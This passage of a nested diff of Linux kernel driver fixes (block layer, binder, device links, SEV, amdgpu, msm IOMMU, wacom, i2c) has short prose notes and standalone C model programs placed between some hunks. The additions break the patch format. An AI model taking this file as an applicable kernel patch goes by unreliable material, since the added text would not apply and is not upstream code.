++			nbytes = bio->bi_iter.bi_size;
++		} else {
+ 			bio->bi_iter.bi_sector = rq->__sector;
++		}
+ 	}
+ 
+ 	bio_advance(bio, nbytes);
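+
+A plain C model of the completion fix above (not blk-mq code): when a
+zone-append BIO completes partially, nbytes is forced to the full BIO
+size so the advance drives the remainder to zero and the end-io path
+runs with the error status:
+
+    #include <stdio.h>
+
+    struct bio_model {
+            unsigned int bi_size;   /* bytes still outstanding */
+            int bi_status;          /* 0 = OK */
+    };
+
+    static void req_bio_endio_sketch(struct bio_model *bio, unsigned int nbytes)
+    {
+            if (bio->bi_size != nbytes) {
+                    bio->bi_status = -1;      /* stands in for BLK_STS_IOERR */
+                    nbytes = bio->bi_size;    /* consume the whole BIO */
+            }
+            bio->bi_size -= nbytes;           /* stands in for bio_advance() */
+            if (bio->bi_size == 0)
+                    printf("bio_endio(status=%d)\n", bio->bi_status);
+    }
+
+    int main(void)
+    {
+            struct bio_model bio = { 8192, 0 };
+
+            req_bio_endio_sketch(&bio, 4096); /* partial zone-append completion */
+            return 0;
+    }
+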
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index d933ef6cc65af..55cd17a13e758 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -477,6 +477,16 @@ binder_enqueue_thread_work_ilocked(struct binder_thread *thread,
+ {
+ 	WARN_ON(!list_empty(&thread->waiting_thread_node));
+ 	binder_enqueue_work_ilocked(work, &thread->todo);
++
++	/* (e)poll-based threads require an explicit wakeup signal when
++	 * queuing their own work; they rely on these events to consume
++	 * messages without I/O block. Without it, threads risk waiting
++	 * indefinitely without handling the work.
++	 */
++	if (thread->looper & BINDER_LOOPER_STATE_POLL &&
++	    thread->pid == current->pid && !thread->process_todo)
++		wake_up_interruptible_sync(&thread->wait);
++
+ 	thread->process_todo = true;
+ }
+ 
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index af90bfb0cc3d8..3078f44dc1861 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -337,10 +337,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++#define DL_MARKER_FLAGS		(DL_FLAG_INFERRED | \
++				 DL_FLAG_CYCLE | \
++				 DL_FLAG_MANAGED)
+ static inline bool device_link_flag_is_sync_state_only(u32 flags)
+ {
+-	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
+-		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++	return (flags & ~DL_MARKER_FLAGS) == DL_FLAG_SYNC_STATE_ONLY;
+ }
+ 
+ /**
+@@ -2054,9 +2056,14 @@ static int fw_devlink_create_devlink(struct device *con,
+ 
+ 	/*
+ 	 * SYNC_STATE_ONLY device links don't block probing and supports cycles.
+-	 * So cycle detection isn't necessary and shouldn't be done.
++	 * So, one might expect that cycle detection isn't necessary for them.
++	 * However, if the device link was marked as SYNC_STATE_ONLY because
++	 * it's part of a cycle, then we still need to do cycle detection. This
++	 * is because the consumer and supplier might be part of multiple cycles
++	 * and we need to detect all those cycles.
+ 	 */
+-	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++	if (!device_link_flag_is_sync_state_only(flags) ||
++	    flags & DL_FLAG_CYCLE) {
+ 		device_links_write_lock();
+ 		if (__fw_devlink_relax_cycles(con, sup_handle)) {
+ 			__fwnode_link_cycle(link);
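+
+The rework above treats INFERRED, CYCLE and MANAGED as mere marker
+bits: strip them first, then require that exactly SYNC_STATE_ONLY
+remains. A small sketch of the predicate; the flag values below are
+illustrative, not the kernel's DL_FLAG_* constants:
+
+    #include <stdbool.h>
+    #include <stdio.h>
+
+    #define DL_FLAG_SYNC_STATE_ONLY (1u << 0)
+    #define DL_FLAG_INFERRED        (1u << 1)
+    #define DL_FLAG_CYCLE           (1u << 2)
+    #define DL_FLAG_MANAGED         (1u << 3)
+
+    #define DL_MARKER_FLAGS (DL_FLAG_INFERRED | DL_FLAG_CYCLE | DL_FLAG_MANAGED)
+
+    static bool sync_state_only(unsigned int flags)
+    {
+            return (flags & ~DL_MARKER_FLAGS) == DL_FLAG_SYNC_STATE_ONLY;
+    }
+
+    int main(void)
+    {
+            printf("%d\n", sync_state_only(DL_FLAG_SYNC_STATE_ONLY |
+                                           DL_FLAG_CYCLE | DL_FLAG_MANAGED));
+            printf("%d\n", sync_state_only(DL_FLAG_SYNC_STATE_ONLY | (1u << 4)));
+            return 0;
+    }
+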
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 56ceba4698024..d238b47f74c34 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -1052,7 +1052,7 @@ static int __init genpd_power_off_unused(void)
+ 
+ 	return 0;
+ }
+-late_initcall(genpd_power_off_unused);
++late_initcall_sync(genpd_power_off_unused);
+ 
+ #ifdef CONFIG_PM_SLEEP
+ 
+diff --git a/drivers/bus/moxtet.c b/drivers/bus/moxtet.c
+index 5eb0fe73ddc45..79fc96c8d8364 100644
+--- a/drivers/bus/moxtet.c
++++ b/drivers/bus/moxtet.c
+@@ -830,6 +830,12 @@ static void moxtet_remove(struct spi_device *spi)
+ 	mutex_destroy(&moxtet->lock);
+ }
+ 
++static const struct spi_device_id moxtet_spi_ids[] = {
++	{ "moxtet" },
++	{ },
++};
++MODULE_DEVICE_TABLE(spi, moxtet_spi_ids);
++
+ static const struct of_device_id moxtet_dt_ids[] = {
+ 	{ .compatible = "cznic,moxtet" },
+ 	{},
+@@ -841,6 +847,7 @@ static struct spi_driver moxtet_spi_driver = {
+ 		.name		= "moxtet",
+ 		.of_match_table = moxtet_dt_ids,
+ 	},
++	.id_table	= moxtet_spi_ids,
+ 	.probe		= moxtet_probe,
+ 	.remove		= moxtet_remove,
+ };
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index b8e02c3a19610..bbfb0f288dc35 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -515,10 +515,16 @@ EXPORT_SYMBOL_GPL(sev_platform_init);
+ 
+ static int __sev_platform_shutdown_locked(int *error)
+ {
+-	struct sev_device *sev = psp_master->sev_data;
++	struct psp_device *psp = psp_master;
++	struct sev_device *sev;
+ 	int ret;
+ 
+-	if (!sev || sev->state == SEV_STATE_UNINIT)
++	if (!psp || !psp->sev_data)
++		return 0;
++
++	sev = psp->sev_data;
++
++	if (sev->state == SEV_STATE_UNINIT)
+ 		return 0;
+ 
+ 	ret = __sev_do_cmd_locked(SEV_CMD_SHUTDOWN, NULL, error);
+diff --git a/drivers/dma/ioat/dma.c b/drivers/dma/ioat/dma.c
+index e2070df6cad28..0b846c605d4bd 100644
+--- a/drivers/dma/ioat/dma.c
++++ b/drivers/dma/ioat/dma.c
+@@ -584,11 +584,11 @@ desc_get_errstat(struct ioatdma_chan *ioat_chan, struct ioat_ring_ent *desc)
+ }
+ 
+ /**
+- * __cleanup - reclaim used descriptors
++ * __ioat_cleanup - reclaim used descriptors
+  * @ioat_chan: channel (ring) to clean
+  * @phys_complete: zeroed (or not) completion address (from status)
+  */
+-static void __cleanup(struct ioatdma_chan *ioat_chan, dma_addr_t phys_complete)
++static void __ioat_cleanup(struct ioatdma_chan *ioat_chan, dma_addr_t phys_complete)
+ {
+ 	struct ioatdma_device *ioat_dma = ioat_chan->ioat_dma;
+ 	struct ioat_ring_ent *desc;
+@@ -675,7 +675,7 @@ static void ioat_cleanup(struct ioatdma_chan *ioat_chan)
+ 	spin_lock_bh(&ioat_chan->cleanup_lock);
+ 
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	if (is_ioat_halted(*ioat_chan->completion)) {
+ 		u32 chanerr = readl(ioat_chan->reg_base + IOAT_CHANERR_OFFSET);
+@@ -712,7 +712,7 @@ static void ioat_restart_channel(struct ioatdma_chan *ioat_chan)
+ 
+ 	ioat_quiesce(ioat_chan, 0);
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	__ioat_restart_chan(ioat_chan);
+ }
+@@ -786,7 +786,7 @@ static void ioat_eh(struct ioatdma_chan *ioat_chan)
+ 
+ 	/* cleanup so tail points to descriptor that caused the error */
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	chanerr = readl(ioat_chan->reg_base + IOAT_CHANERR_OFFSET);
+ 	pci_read_config_dword(pdev, IOAT_PCI_CHANERR_INT_OFFSET, &chanerr_int);
+@@ -943,7 +943,7 @@ void ioat_timer_event(struct timer_list *t)
+ 		/* timer restarted in ioat_cleanup_preamble
+ 		 * and IOAT_COMPLETION_ACK cleared
+ 		 */
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 		goto unlock_out;
+ 	}
+ 
+diff --git a/drivers/firewire/core-device.c b/drivers/firewire/core-device.c
+index 74bab06283b71..1879ec27c0236 100644
+--- a/drivers/firewire/core-device.c
++++ b/drivers/firewire/core-device.c
+@@ -100,10 +100,9 @@ static int textual_leaf_to_string(const u32 *block, char *buf, size_t size)
+  * @buf:	where to put the string
+  * @size:	size of @buf, in bytes
+  *
+- * The string is taken from a minimal ASCII text descriptor leaf after
+- * the immediate entry with @key.  The string is zero-terminated.
+- * An overlong string is silently truncated such that it and the
+- * zero byte fit into @size.
++ * The string is taken from a minimal ASCII text descriptor leaf just after the entry with the
++ * @key. The string is zero-terminated. An overlong string is silently truncated such that it
++ * and the zero byte fit into @size.
+  *
+  * Returns strlen(buf) or a negative error code.
+  */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 4b91f95066eca..6a4749c0c5a58 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4203,7 +4203,6 @@ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon)
+ 		drm_fb_helper_set_suspend_unlocked(adev_to_drm(adev)->fb_helper, true);
+ 
+ 	cancel_delayed_work_sync(&adev->delayed_init_work);
+-	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
+ 
+ 	amdgpu_ras_suspend(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 23f0067f92e4e..b803e785d3aff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -585,8 +585,15 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+-			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			/* If going to s2idle, no need to wait */
++			if (adev->in_s0ix) {
++				if (!amdgpu_dpm_set_powergating_by_smu(adev,
++						AMD_IP_BLOCK_TYPE_GFX, true))
++					adev->gfx.gfx_off_state = true;
++			} else {
++				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
++			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index f02e509d5facb..a826c92933199 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6001,7 +6001,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
++			saved_mode.picture_aspect_ratio = mode.picture_aspect_ratio;
+ 			drm_mode_copy(&mode, freesync_mode);
++			mode.picture_aspect_ratio = saved_mode.picture_aspect_ratio;
+ 		} else {
+ 			decide_crtc_timing_for_drm_display_mode(
+ 					&mode, preferred_mode, scale);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/Makefile b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+index ca7d240006213..6fdf87a6e240f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+@@ -60,11 +60,11 @@ ifdef CONFIG_DRM_AMD_DC_DCN
+ CFLAGS_$(AMDDALPATH)/dc/dml/display_mode_vba.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn10/dcn10_fpu.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/dcn20_fpu.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_rq_dlg_calc_20.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20v2.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20v2.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_rq_dlg_calc_20v2.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_mode_vba_21.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_mode_vba_21.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_rq_dlg_calc_21.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn30/display_mode_vba_30.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn30/display_rq_dlg_calc_30.o := $(dml_ccflags)
+diff --git a/drivers/gpu/drm/drm_prime.c b/drivers/gpu/drm/drm_prime.c
+index eb09e86044c6d..68a6d4b0ead75 100644
+--- a/drivers/gpu/drm/drm_prime.c
++++ b/drivers/gpu/drm/drm_prime.c
+@@ -828,7 +828,7 @@ struct sg_table *drm_prime_pages_to_sg(struct drm_device *dev,
+ 	if (max_segment == 0)
+ 		max_segment = UINT_MAX;
+ 	err = sg_alloc_table_from_pages_segment(sg, pages, nr_pages, 0,
+-						nr_pages << PAGE_SHIFT,
++						(unsigned long)nr_pages << PAGE_SHIFT,
+ 						max_segment, GFP_KERNEL);
+ 	if (err) {
+ 		kfree(sg);
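+
+The cast above avoids a classic truncation: on 64-bit kernels, shifting
+a 32-bit page count by PAGE_SHIFT wraps for buffers of 4 GiB and up
+unless the count is widened first. A minimal demonstration on LP64:
+
+    #include <stdio.h>
+
+    #define PAGE_SHIFT 12
+
+    int main(void)
+    {
+            unsigned int nr_pages = 1u << 20;   /* 4 GiB worth of 4 KiB pages */
+
+            unsigned long wrong = nr_pages << PAGE_SHIFT;  /* wraps to 0 */
+            unsigned long right = (unsigned long)nr_pages << PAGE_SHIFT;
+
+            printf("wrong=%#lx right=%#lx\n", wrong, right);
+            return 0;
+    }
+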
+diff --git a/drivers/gpu/drm/msm/msm_iommu.c b/drivers/gpu/drm/msm/msm_iommu.c
+index d12ba47b37c4f..0de3612135e96 100644
+--- a/drivers/gpu/drm/msm/msm_iommu.c
++++ b/drivers/gpu/drm/msm/msm_iommu.c
+@@ -21,6 +21,8 @@ struct msm_iommu_pagetable {
+ 	struct msm_mmu base;
+ 	struct msm_mmu *parent;
+ 	struct io_pgtable_ops *pgtbl_ops;
++	const struct iommu_flush_ops *tlb;
++	struct device *iommu_dev;
+ 	unsigned long pgsize_bitmap;	/* Bitmap of page sizes in use */
+ 	phys_addr_t ttbr;
+ 	u32 asid;
+@@ -194,11 +196,33 @@ static const struct msm_mmu_funcs pagetable_funcs = {
+ 
+ static void msm_iommu_tlb_flush_all(void *cookie)
+ {
++	struct msm_iommu_pagetable *pagetable = cookie;
++	struct adreno_smmu_priv *adreno_smmu;
++
++	if (!pm_runtime_get_if_in_use(pagetable->iommu_dev))
++		return;
++
++	adreno_smmu = dev_get_drvdata(pagetable->parent->dev);
++
++	pagetable->tlb->tlb_flush_all((void *)adreno_smmu->cookie);
++
++	pm_runtime_put_autosuspend(pagetable->iommu_dev);
+ }
+ 
+ static void msm_iommu_tlb_flush_walk(unsigned long iova, size_t size,
+ 		size_t granule, void *cookie)
+ {
++	struct msm_iommu_pagetable *pagetable = cookie;
++	struct adreno_smmu_priv *adreno_smmu;
++
++	if (!pm_runtime_get_if_in_use(pagetable->iommu_dev))
++		return;
++
++	adreno_smmu = dev_get_drvdata(pagetable->parent->dev);
++
++	pagetable->tlb->tlb_flush_walk(iova, size, granule, (void *)adreno_smmu->cookie);
++
++	pm_runtime_put_autosuspend(pagetable->iommu_dev);
+ }
+ 
+ static void msm_iommu_tlb_add_page(struct iommu_iotlb_gather *gather,
+@@ -206,7 +230,7 @@ static void msm_iommu_tlb_add_page(struct iommu_iotlb_gather *gather,
+ {
+ }
+ 
+-static const struct iommu_flush_ops null_tlb_ops = {
++static const struct iommu_flush_ops tlb_ops = {
+ 	.tlb_flush_all = msm_iommu_tlb_flush_all,
+ 	.tlb_flush_walk = msm_iommu_tlb_flush_walk,
+ 	.tlb_add_page = msm_iommu_tlb_add_page,
+@@ -254,10 +278,10 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 
+ 	/* The incoming cfg will have the TTBR1 quirk enabled */
+ 	ttbr0_cfg.quirks &= ~IO_PGTABLE_QUIRK_ARM_TTBR1;
+-	ttbr0_cfg.tlb = &null_tlb_ops;
++	ttbr0_cfg.tlb = &tlb_ops;
+ 
+ 	pagetable->pgtbl_ops = alloc_io_pgtable_ops(ARM_64_LPAE_S1,
+-		&ttbr0_cfg, iommu->domain);
++		&ttbr0_cfg, pagetable);
+ 
+ 	if (!pagetable->pgtbl_ops) {
+ 		kfree(pagetable);
+@@ -282,6 +306,8 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 
+ 	/* Needed later for TLB flush */
+ 	pagetable->parent = parent;
++	pagetable->tlb = ttbr1_cfg->tlb;
++	pagetable->iommu_dev = ttbr1_cfg->iommu_dev;
+ 	pagetable->pgsize_bitmap = ttbr0_cfg.pgsize_bitmap;
+ 	pagetable->ttbr = ttbr0_cfg.arm_lpae_s1_cfg.ttbr;
+ 
+diff --git a/drivers/gpu/drm/nouveau/nouveau_svm.c b/drivers/gpu/drm/nouveau/nouveau_svm.c
+index 31a5b81ee9fc4..be6674fb1af71 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_svm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_svm.c
+@@ -997,7 +997,7 @@ nouveau_svm_fault_buffer_ctor(struct nouveau_svm *svm, s32 oclass, int id)
+ 	if (ret)
+ 		return ret;
+ 
+-	buffer->fault = kvcalloc(sizeof(*buffer->fault), buffer->entries, GFP_KERNEL);
++	buffer->fault = kvcalloc(buffer->entries, sizeof(*buffer->fault), GFP_KERNEL);
+ 	if (!buffer->fault)
+ 		return -ENOMEM;
+ 
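+
+The swap above restores the calloc() convention that kvcalloc()
+follows: element count first, element size second, so the allocator's
+overflow check sees the arguments it expects. A user-space analogue
+with a hypothetical entry type:
+
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    struct fault_entry { unsigned long inst, addr; }; /* illustrative */
+
+    int main(void)
+    {
+            size_t entries = 128;
+
+            /* count first, then size -- matches calloc()/kvcalloc() */
+            struct fault_entry *fault = calloc(entries, sizeof(*fault));
+            if (!fault)
+                    return 1;
+
+            printf("allocated %zu bytes\n", entries * sizeof(*fault));
+            free(fault);
+            return 0;
+    }
+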
+diff --git a/drivers/gpu/drm/virtio/virtgpu_drv.c b/drivers/gpu/drm/virtio/virtgpu_drv.c
+index 0035affc3e590..9b2d235168bb6 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_drv.c
++++ b/drivers/gpu/drm/virtio/virtgpu_drv.c
+@@ -93,6 +93,7 @@ static int virtio_gpu_probe(struct virtio_device *vdev)
+ 			goto err_free;
+ 	}
+ 
++	dma_set_max_seg_size(dev->dev, dma_max_mapping_size(dev->dev) ?: UINT_MAX);
+ 	ret = virtio_gpu_init(vdev, dev);
+ 	if (ret)
+ 		goto err_free;
+diff --git a/drivers/hid/i2c-hid/i2c-hid-of.c b/drivers/hid/i2c-hid/i2c-hid-of.c
+index 97a27a803f58d..6feb812fce375 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-of.c
++++ b/drivers/hid/i2c-hid/i2c-hid-of.c
+@@ -80,6 +80,7 @@ static int i2c_hid_of_probe(struct i2c_client *client,
+ 	if (!ihid_of)
+ 		return -ENOMEM;
+ 
++	ihid_of->client = client;
+ 	ihid_of->ops.power_up = i2c_hid_of_power_up;
+ 	ihid_of->ops.power_down = i2c_hid_of_power_down;
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index af163e8dfec07..12d4c28741d7e 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2080,7 +2080,7 @@ static int wacom_allocate_inputs(struct wacom *wacom)
+ 	return 0;
+ }
+ 
+-static int wacom_register_inputs(struct wacom *wacom)
++static int wacom_setup_inputs(struct wacom *wacom)
+ {
+ 	struct input_dev *pen_input_dev, *touch_input_dev, *pad_input_dev;
+ 	struct wacom_wac *wacom_wac = &(wacom->wacom_wac);
+@@ -2099,10 +2099,6 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(pen_input_dev);
+ 		wacom_wac->pen_input = NULL;
+ 		pen_input_dev = NULL;
+-	} else {
+-		error = input_register_device(pen_input_dev);
+-		if (error)
+-			goto fail;
+ 	}
+ 
+ 	error = wacom_setup_touch_input_capabilities(touch_input_dev, wacom_wac);
+@@ -2111,10 +2107,6 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(touch_input_dev);
+ 		wacom_wac->touch_input = NULL;
+ 		touch_input_dev = NULL;
+-	} else {
+-		error = input_register_device(touch_input_dev);
+-		if (error)
+-			goto fail;
+ 	}
+ 
+ 	error = wacom_setup_pad_input_capabilities(pad_input_dev, wacom_wac);
+@@ -2123,7 +2115,34 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(pad_input_dev);
+ 		wacom_wac->pad_input = NULL;
+ 		pad_input_dev = NULL;
+-	} else {
++	}
++
++	return 0;
++}
++
++static int wacom_register_inputs(struct wacom *wacom)
++{
++	struct input_dev *pen_input_dev, *touch_input_dev, *pad_input_dev;
++	struct wacom_wac *wacom_wac = &(wacom->wacom_wac);
++	int error = 0;
++
++	pen_input_dev = wacom_wac->pen_input;
++	touch_input_dev = wacom_wac->touch_input;
++	pad_input_dev = wacom_wac->pad_input;
++
++	if (pen_input_dev) {
++		error = input_register_device(pen_input_dev);
++		if (error)
++			goto fail;
++	}
++
++	if (touch_input_dev) {
++		error = input_register_device(touch_input_dev);
++		if (error)
++			goto fail;
++	}
++
++	if (pad_input_dev) {
+ 		error = input_register_device(pad_input_dev);
+ 		if (error)
+ 			goto fail;
+@@ -2379,6 +2398,20 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 			goto fail;
+ 	}
+ 
++	error = wacom_setup_inputs(wacom);
++	if (error)
++		goto fail;
++
++	if (features->type == HID_GENERIC)
++		connect_mask |= HID_CONNECT_DRIVER;
++
++	/* Regular HID work starts now */
++	error = hid_hw_start(hdev, connect_mask);
++	if (error) {
++		hid_err(hdev, "hw start failed\n");
++		goto fail;
++	}
++
+ 	error = wacom_register_inputs(wacom);
+ 	if (error)
+ 		goto fail;
+@@ -2393,16 +2426,6 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 			goto fail;
+ 	}
+ 
+-	if (features->type == HID_GENERIC)
+-		connect_mask |= HID_CONNECT_DRIVER;
+-
+-	/* Regular HID work starts now */
+-	error = hid_hw_start(hdev, connect_mask);
+-	if (error) {
+-		hid_err(hdev, "hw start failed\n");
+-		goto fail;
+-	}
+-
+ 	if (!wireless) {
+ 		/* Note that if query fails it is not a hard failure */
+ 		wacom_query_tablet_data(wacom);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 165ed872fa4e7..53235b276bb24 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -2571,7 +2571,14 @@ static void wacom_wac_pen_report(struct hid_device *hdev,
+ 				wacom_wac->hid_data.tipswitch);
+ 		input_report_key(input, wacom_wac->tool[0], sense);
+ 		if (wacom_wac->serial[0]) {
+-			input_event(input, EV_MSC, MSC_SERIAL, wacom_wac->serial[0]);
++			/*
++			 * xf86-input-wacom does not accept a serial number
++			 * of '0'. Report the low 32 bits if possible, but
++			 * if they are zero, report the upper ones instead.
++			 */
++			__u32 serial_lo = wacom_wac->serial[0] & 0xFFFFFFFFu;
++			__u32 serial_hi = wacom_wac->serial[0] >> 32;
++			input_event(input, EV_MSC, MSC_SERIAL, (int)(serial_lo ? serial_lo : serial_hi));
+ 			input_report_abs(input, ABS_MISC, sense ? id : 0);
+ 		}
+ 
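+
+A sketch of the serial selection added above: report the low 32 bits of
+the 64-bit serial unless they are zero, then fall back to the high half
+so userspace never sees a zero serial:
+
+    #include <stdio.h>
+    #include <stdint.h>
+
+    static uint32_t reportable_serial(uint64_t serial)
+    {
+            uint32_t lo = serial & 0xFFFFFFFFu;
+            uint32_t hi = serial >> 32;
+
+            return lo ? lo : hi;    /* never 0 while any bits are set */
+    }
+
+    int main(void)
+    {
+            printf("%#x\n", reportable_serial(0x00000000DEADBEEFULL));
+            printf("%#x\n", reportable_serial(0xCAFEF00D00000000ULL));
+            return 0;
+    }
+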
+diff --git a/drivers/i2c/busses/Makefile b/drivers/i2c/busses/Makefile
+index e73cdb1d2b5a8..784a803279d99 100644
+--- a/drivers/i2c/busses/Makefile
++++ b/drivers/i2c/busses/Makefile
+@@ -89,10 +89,8 @@ obj-$(CONFIG_I2C_NPCM)		+= i2c-npcm7xx.o
+ obj-$(CONFIG_I2C_OCORES)	+= i2c-ocores.o
+ obj-$(CONFIG_I2C_OMAP)		+= i2c-omap.o
+ obj-$(CONFIG_I2C_OWL)		+= i2c-owl.o
+-i2c-pasemi-objs := i2c-pasemi-core.o i2c-pasemi-pci.o
+-obj-$(CONFIG_I2C_PASEMI)	+= i2c-pasemi.o
+-i2c-apple-objs := i2c-pasemi-core.o i2c-pasemi-platform.o
+-obj-$(CONFIG_I2C_APPLE)	+= i2c-apple.o
++obj-$(CONFIG_I2C_PASEMI)	+= i2c-pasemi-core.o i2c-pasemi-pci.o
++obj-$(CONFIG_I2C_APPLE)		+= i2c-pasemi-core.o i2c-pasemi-platform.o
+ obj-$(CONFIG_I2C_PCA_PLATFORM)	+= i2c-pca-platform.o
+ obj-$(CONFIG_I2C_PNX)		+= i2c-pnx.o
+ obj-$(CONFIG_I2C_PXA)		+= i2c-pxa.o
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 3159ffbb77a20..9a4e9bf304c28 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -500,11 +500,10 @@ static int i801_block_transaction_by_block(struct i801_priv *priv,
+ 	/* Set block buffer mode */
+ 	outb_p(inb_p(SMBAUXCTL(priv)) | SMBAUXCTL_E32B, SMBAUXCTL(priv));
+ 
+-	inb_p(SMBHSTCNT(priv)); /* reset the data buffer index */
+-
+ 	if (read_write == I2C_SMBUS_WRITE) {
+ 		len = data->block[0];
+ 		outb_p(len, SMBHSTDAT0(priv));
++		inb_p(SMBHSTCNT(priv));	/* reset the data buffer index */
+ 		for (i = 0; i < len; i++)
+ 			outb_p(data->block[i+1], SMBBLKDAT(priv));
+ 	}
+@@ -520,6 +519,7 @@ static int i801_block_transaction_by_block(struct i801_priv *priv,
+ 			return -EPROTO;
+ 
+ 		data->block[0] = len;
++		inb_p(SMBHSTCNT(priv));	/* reset the data buffer index */
+ 		for (i = 0; i < len; i++)
+ 			data->block[i + 1] = inb_p(SMBBLKDAT(priv));
+ 	}
+diff --git a/drivers/i2c/busses/i2c-pasemi-core.c b/drivers/i2c/busses/i2c-pasemi-core.c
+index 9028ffb58cc07..f297e41352e7a 100644
+--- a/drivers/i2c/busses/i2c-pasemi-core.c
++++ b/drivers/i2c/busses/i2c-pasemi-core.c
+@@ -356,3 +356,8 @@ int pasemi_i2c_common_probe(struct pasemi_smbus *smbus)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(pasemi_i2c_common_probe);
++
++MODULE_LICENSE("GPL");
++MODULE_AUTHOR("Olof Johansson <olof@lixom.net>");
++MODULE_DESCRIPTION("PA Semi PWRficient SMBus driver");
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index 8fce98bb77ff9..75b9c3f26bba6 100644
